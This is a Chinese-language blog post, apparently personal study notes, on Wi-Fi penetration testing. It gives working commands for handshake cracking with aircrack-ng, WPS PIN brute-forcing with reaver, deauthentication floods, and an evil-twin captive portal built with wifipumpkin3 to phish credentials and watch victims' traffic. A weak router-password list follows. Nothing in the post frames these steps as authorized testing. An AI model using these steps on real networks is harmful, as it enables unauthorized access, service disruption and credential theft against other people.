<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>无线渗透 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="大一学习的了">
<meta property="og:type" content="article">
<meta property="og:title" content="无线渗透">
<meta property="og:url" content="http://example.com/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="大一学习的了">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/1.jpg">
<meta property="og:image" content="http://example.com/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/2.jpg">
<meta property="og:image" content="http://example.com/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/3.jpg">
<meta property="og:image" content="http://example.com/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/4.jpg">
<meta property="og:image" content="http://example.com/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/5.jpg">
<meta property="og:image" content="http://example.com/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/6.jpg">
<meta property="og:image" content="http://example.com/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/7.jpg">
<meta property="og:image" content="http://example.com/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/8.jpg">
<meta property="og:image" content="http://example.com/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/9.jpg">
<meta property="og:image" content="http://example.com/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/10.jpg">
<meta property="article:published_time" content="2021-07-28T06:39:04.000Z">
<meta property="article:modified_time" content="2022-05-20T01:16:52.897Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/1.jpg">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 6.2.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-无线渗透" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/" class="article-date">
  <time class="dt-published" datetime="2021-07-28T06:39:04.000Z" itemprop="datePublished">2021-07-28</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      无线渗透
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <p>大一学习的了</p>
<span id="more"></span>

<p>当初还去硬啃了<code>802.11</code>的各类协议,现在想来没什么用</p>
<h2 id="基础"><a href="#基础" class="headerlink" title="基础"></a>基础</h2><h3 id="网络结构"><a href="#网络结构" class="headerlink" title="网络结构"></a>网络结构</h3><h4 id="AP基站"><a href="#AP基站" class="headerlink" title="AP基站"></a>AP基站</h4><p>即wifi热点,可以理解成服务端,实际上是个转发器</p>
<h4 id="STA站点"><a href="#STA站点" class="headerlink" title="STA站点"></a>STA站点</h4><p>客户端 ,手机、电脑等</p>
<h3 id="2-4G-x2F-5G"><a href="#2-4G-x2F-5G" class="headerlink" title="2.4G&#x2F;5G"></a>2.4G&#x2F;5G</h3><p>这两个协议是指的频率,不是华为的5G…</p>
<h4 id="2-4G"><a href="#2-4G" class="headerlink" title="2.4G"></a>2.4G</h4><p>使用<code>802.11b/g/n/</code>协议</p>
<h4 id="5G"><a href="#5G" class="headerlink" title="5G"></a>5G</h4><p>使用<code>802.11ac</code>协议,特点是相比2.4G同信号下速度更快,网络质量更好,但穿透能力弱</p>
<h3 id="信道和频率"><a href="#信道和频率" class="headerlink" title="信道和频率"></a>信道和频率</h3><h4 id="2-4G-1"><a href="#2-4G-1" class="headerlink" title="2.4G"></a>2.4G</h4><p>2.4G频率范围为<code>2.412~2.474GHz</code>,14个信道</p>
<p>我国可用13个</p>
<table>
<thead>
<tr>
<th>信道</th>
<th>中心频率</th>
<th>频率范围</th>
</tr>
</thead>
<tbody><tr>
<td>01</td>
<td>2412</td>
<td>2401-2423</td>
</tr>
<tr>
<td>02</td>
<td>2417</td>
<td>2406-2428</td>
</tr>
<tr>
<td>03</td>
<td>2422</td>
<td>2411-2433</td>
</tr>
<tr>
<td>04</td>
<td>2427</td>
<td>2416-2438</td>
</tr>
<tr>
<td>05</td>
<td>2432</td>
<td>2421-2443</td>
</tr>
<tr>
<td>06</td>
<td>2437</td>
<td>2426-2448</td>
</tr>
<tr>
<td>07</td>
<td>2442</td>
<td>2431-2453</td>
</tr>
<tr>
<td>08</td>
<td>2447</td>
<td>2426-2448</td>
</tr>
<tr>
<td>09</td>
<td>2452</td>
<td>2441-2463</td>
</tr>
<tr>
<td>10</td>
<td>2457</td>
<td>2446-2468</td>
</tr>
<tr>
<td>11</td>
<td>2462</td>
<td>2451-2473</td>
</tr>
<tr>
<td>12</td>
<td>2467</td>
<td>2456-2478</td>
</tr>
<tr>
<td>13</td>
<td>2472</td>
<td>2461-2483</td>
</tr>
</tbody></table>
<h4 id="5G-1"><a href="#5G-1" class="headerlink" title="5G"></a>5G</h4><p>5G频率范围为<code>4.915~5.865Ghz</code>,5个信道,分别为</p>
<table>
<thead>
<tr>
<th>信道</th>
<th>中心频率</th>
</tr>
</thead>
<tbody><tr>
<td>149</td>
<td>5745</td>
</tr>
<tr>
<td>153</td>
<td>5765</td>
</tr>
<tr>
<td>157</td>
<td>5785</td>
</tr>
<tr>
<td>161</td>
<td>5805</td>
</tr>
<tr>
<td>165</td>
<td>5825</td>
</tr>
</tbody></table>
<h2 id="设备"><a href="#设备" class="headerlink" title="设备"></a>设备</h2><p>最少有一个支持监听模式的无线网卡</p>
<p>如果想要钓鱼,最好要两个</p>
<h3 id="无线网卡的四个工作模式"><a href="#无线网卡的四个工作模式" class="headerlink" title="无线网卡的四个工作模式"></a>无线网卡的四个工作模式</h3><ul>
<li>Managed :上网时的模式,类似客户端</li>
<li>Master :类似服务端</li>
<li>Ad hoc :没用过</li>
<li>Monitor :监听模式</li>
</ul>
<h2 id="攻击方式"><a href="#攻击方式" class="headerlink" title="攻击方式"></a>攻击方式</h2><ul>
<li>只想上网<ul>
<li>暴破<ul>
<li>抓握手包–效率高, 每秒上万次测试(生成彩虹表后速度更快),但依赖字典</li>
<li>直接暴, 成功率低</li>
</ul>
</li>
<li>pin码攻击–成功率高,三小时几乎必出, 但新设备默认关闭此功能</li>
<li>Wifi万能钥匙–成功率高,手机root后或者小米手机可以直接读出热点密码</li>
<li>钓鱼</li>
</ul>
</li>
<li>恶心人<ul>
<li>洪水攻击<ul>
<li>取消认证洪水攻击–强制所有人下线</li>
<li>验证洪水攻击–类似<code>DDoS</code>,但新设备大多性能好, 此攻击手段不如<code>取消认证洪水</code>效果好</li>
<li>伪AP–没啥攻击力</li>
<li>射频干扰攻击–设备要求高,高考等场合防作弊用的就是这种方式</li>
</ul>
</li>
</ul>
</li>
<li>得到管理员权限<ul>
<li>ssh密码爆破</li>
<li>ssh 弱密码测试</li>
<li>网页端默认密码、弱密码测试</li>
<li>网页端密码爆破</li>
<li>设备漏洞</li>
</ul>
</li>
</ul>
<h2 id="爆破"><a href="#爆破" class="headerlink" title="爆破"></a>爆破</h2><h3 id="获取握手包"><a href="#获取握手包" class="headerlink" title="获取握手包"></a>获取握手包</h3><p>我以前学习的时候还需要自己去抓, 现在有挺多新工具挺好用的, 傻瓜式操作</p>
<p>比如这个 <a target="_blank" rel="noopener" href="https://github.com/v1s1t0r1sh3r3/airgeddon">airgeddon</a></p>
<p>界面挺好看的</p>
<p><img src="/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/1.jpg" alt="1.jpg"></p>
<p>选择了网卡后选择攻击方式就可以了</p>
<p>比如这里选择获取握手包</p>
<p><img src="/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/2.jpg" alt="2.jpg"></p>
<p>抓下来的握手包默认后缀为<code>cap</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">file handshake.cap</span><br><span class="line">handshake.cap: pcap capture file, microsecond ts (little-endian) - version 2.4 (802.11, capture length 65535)</span><br></pre></td></tr></table></figure>
<p>然后直接用<code>aircreack-ng</code>跑包就可以了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aircrack-ng -w li.txt /home/happi0/handshake-EC:26:CA:B0:5A:CE.cap</span><br></pre></td></tr></table></figure>
<p><img src="/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/3.jpg" alt="3.jpg"></p>
<p>可以看到还挺快的</p>
<p>但缺陷也很明显, 抓握手包需要信号不错, 而且用户会被强制下线多次</p>
<p>跑包看字典够不够全面</p>
<h2 id="取消认证洪水攻击"><a href="#取消认证洪水攻击" class="headerlink" title="取消认证洪水攻击"></a>取消认证洪水攻击</h2><h2 id="pin码攻击"><a href="#pin码攻击" class="headerlink" title="pin码攻击"></a>pin码攻击</h2><p>源于设计缺陷</p>
<p>理论上,只要路由器开启了<code>wps</code>, 三个小时肯定能拿到密码的,毕竟一共才<code>11000</code>种情况</p>
<p>但现在的路由器默认都是关闭该功能的</p>
<p>(反正我关了<code>wps</code>的,随便看)</p>
<p><img src="/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/4.jpg" alt="4.jpg"></p>
<p>爆破pin码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo reaver -i &lt;wlan&gt; -b &lt;mac&gt; -p &lt;pin&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/5.jpg" alt="5.jpg"></p>
<p>已知pin码获取密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo reaver -i &lt;wlan&gt; -b &lt;mac&gt; -vv -c &lt;ch&gt;</span><br></pre></td></tr></table></figure>

<h2 id="取消认证洪水攻击-1"><a href="#取消认证洪水攻击-1" class="headerlink" title="取消认证洪水攻击"></a>取消认证洪水攻击</h2><h3 id="开启监听模式"><a href="#开启监听模式" class="headerlink" title="开启监听模式"></a>开启监听模式</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo airmon-ng start &lt;wlan&gt;</span><br></pre></td></tr></table></figure>

<h3 id="开始嗅探"><a href="#开始嗅探" class="headerlink" title="开始嗅探"></a>开始嗅探</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo airodump-ng &lt;wlan&gt;</span><br></pre></td></tr></table></figure>

<h3 id="设置信道"><a href="#设置信道" class="headerlink" title="设置信道"></a>设置信道</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">airodump &lt;wlan&gt; -c &lt;ch&gt;</span><br></pre></td></tr></table></figure>

<h3 id="死亡攻击"><a href="#死亡攻击" class="headerlink" title="死亡攻击"></a>死亡攻击</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo aireplay-ng -0 0 -a &lt;ap-mac&gt;  &lt;wlan-mon&gt;</span><br></pre></td></tr></table></figure>

<h2 id="中间人攻击"><a href="#中间人攻击" class="headerlink" title="中间人攻击"></a>中间人攻击</h2><p>这个挺好玩的</p>
<h3 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h3><p>推荐<code>wifipumpkin3</code>, 虽然我搭建遇到不少坑</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/P0cL4bs/wifipumpkin3.git</span><br><span class="line">cd wifipumpkin3/</span><br></pre></td></tr></table></figure>
<p>官方提供的<code>Dockerfile</code>有问题, 一直搭建不上</p>
<p>将<code>Dockerfile</code>内容替换成以下内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">FROM ubuntu:18.04</span><br><span class="line">ENV DEBIAN_FRONTEND noninteractive</span><br><span class="line">RUN apt-get update \</span><br><span class="line">    &amp;&amp; apt-get -y install \</span><br><span class="line">        hostapd \</span><br><span class="line">	    nano \</span><br><span class="line">	    iw \</span><br><span class="line">        wireless-tools \</span><br><span class="line">        ifupdown \</span><br><span class="line">        python3.7 \</span><br><span class="line">        python3-pip \</span><br><span class="line">        python3.7-dev \</span><br><span class="line">        iptables \</span><br><span class="line">        net-tools \</span><br><span class="line">        rfkill \</span><br><span class="line">        libpcap-dev \</span><br><span class="line">    &amp;&amp; apt-get clean &amp;&amp; rm -rf /var/lib/apt/lists/*</span><br><span class="line">COPY . /usr/src/app</span><br><span class="line">WORKDIR /usr/src/app</span><br><span class="line">COPY config/hostapd/hostapd.conf /etc/hostapd/hostapd.conf</span><br><span class="line">RUN update-alternatives --install /usr/bin/python3 python3 /usr/bin/python3.7 1</span><br><span class="line">RUN python3.7 -m pip install --upgrade pip</span><br><span class="line">RUN python3.7 -m pip install pyqt5==5.14</span><br><span class="line">RUN python3.7 -m pip install setuptools_rust</span><br><span class="line">RUN python3.7 -m pip install -r requirements.txt </span><br><span class="line">RUN python3.7 setup.py install</span><br><span class="line">WORKDIR /root/.config/wifipumpkin3</span><br><span class="line">CMD /usr/local/bin/wifipumpkin3</span><br></pre></td></tr></table></figure>

<p>然后构造镜像</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker build --network host -t &quot;wifipumpkin3&quot; .</span><br></pre></td></tr></table></figure>

<p>启动容器</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker run --privileged -ti --rm --name wifipumpkin3 --net host &quot;wifipumpkin3&quot;</span><br></pre></td></tr></table></figure>

<p>这里的<code>--net host</code>和<code>--network host</code>都是使容器或镜像使用和主机一样的网络, 否则后面流量转发可能失败</p>
<p>启动前确保主机能上网,于是这里需要有两张无线网卡或者一张无线网线且连接有线网络的设备</p>
<p>(一个用来转发, 一个用来上网)</p>
<p>启动后界面如下</p>
<p><img src="/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/6.jpg" alt="6.jpg"></p>
<p>设置网卡、选择代理方式</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">set interface &lt;wlan&gt;</span><br><span class="line">set proxy captiveflask </span><br><span class="line">set captiveflask.swifi true </span><br><span class="line">start</span><br></pre></td></tr></table></figure>
<p>用户连接上后显示如下</p>
<p><img src="/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/7.jpg" alt="7.jpg"></p>
<p>由于我这里用的默认界面, 迷惑性还不够强, 可以自己写一个和真实环境一样的前端网页, 用来钓鱼</p>
<p>主机上显示</p>
<p><img src="/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/8.jpg" alt="8.jpg"></p>
<p>可以钓鱼用户的帐号密码等信息</p>
<p>另外用户的流量也是完全经过我们主机可以看到用户浏览什么网页、账户信息等数据</p>
<p><img src="/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/9.jpg" alt="9.jpg"></p>
<h2 id="路由器权限"><a href="#路由器权限" class="headerlink" title="路由器权限"></a>路由器权限</h2><p>通常找到路由器登录界面或者ssh爆破密码</p>
<h3 id="找到路由器ip"><a href="#找到路由器ip" class="headerlink" title="找到路由器ip"></a>找到路由器ip</h3><p>目前很多<code>DNS</code>解析会由路由器提供</p>
<p>于是在linux下</p>
<p><code>cat /etc/resolv.conf</code>就可以拿到路由器地址</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> /etc/resolv.conf</span><br><span class="line"><span class="comment"># Generated by NetworkManager</span></span><br><span class="line">nameserver 192.168.2.1</span><br></pre></td></tr></table></figure>

<p>用<code>nmap</code>扫也是一个好方法,毕竟还能顺便看一下开放了哪些端口</p>
<h3 id="密码猜测"><a href="#密码猜测" class="headerlink" title="密码猜测"></a>密码猜测</h3><p>常见的弱密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">123456</span><br><span class="line">12345678</span><br><span class="line">admin</span><br><span class="line">useradmin</span><br><span class="line">123456789</span><br><span class="line">0123456789</span><br><span class="line">666666</span><br><span class="line">888888</span><br><span class="line">66666666</span><br><span class="line">88888888</span><br></pre></td></tr></table></figure>
<p>还有<code>wifi密码</code></p>
<p>顺带一提,<code>BWR661</code>的奇葩逻辑</p>
<p>默认把<code>wifi密码</code>设置成管理员密码</p>
<p>岂不是人均管理员权限</p>
<p><img src="/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/10.jpg" alt="10.jpg"></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2021/07/28/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/" data-id="cl3dreg0m0005lxsb83xe41l1" data-title="无线渗透" class="article-share-link">Share</a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/web/" rel="tag">web</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2021/09/06/Analysis-of-Shadowsocks/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          Analysis of Shadowsocks
        
      </div>
    </a>
  
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/crypto/" rel="tag">crypto</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/misc/" rel="tag">misc</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/re/" rel="tag">re</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/update/" rel="tag">update</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web/" rel="tag">web</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/crypto/" style="font-size: 10px;">crypto</a> <a href="/tags/misc/" style="font-size: 15px;">misc</a> <a href="/tags/pwn/" style="font-size: 15px;">pwn</a> <a href="/tags/re/" style="font-size: 20px;">re</a> <a href="/tags/update/" style="font-size: 10px;">update</a> <a href="/tags/web/" style="font-size: 20px;">web</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/04/">April 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/12/">December 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/09/">September 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/07/">July 2021</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2022/04/15/%E5%8D%9A%E5%AE%A2%E6%9B%B4%E6%96%B0%E9%80%9A%E7%9F%A5/">博客更新通知</a>
          </li>
        
          <li>
            <a href="/2022/04/14/%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%91%E7%9A%84%E5%B0%8F%E6%9D%BF%E5%AD%90/">西湖论剑的小板子</a>
          </li>
        
          <li>
            <a href="/2022/04/08/CVE-2020-8423/">CVE-2020-8423</a>
          </li>
        
          <li>
            <a href="/2022/04/02/CVE-2021-4034/">CVE-2021-4034</a>
          </li>
        
          <li>
            <a href="/2021/12/10/%E6%9C%A8%E9%A9%AC%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/">木马流量分析</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2022 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>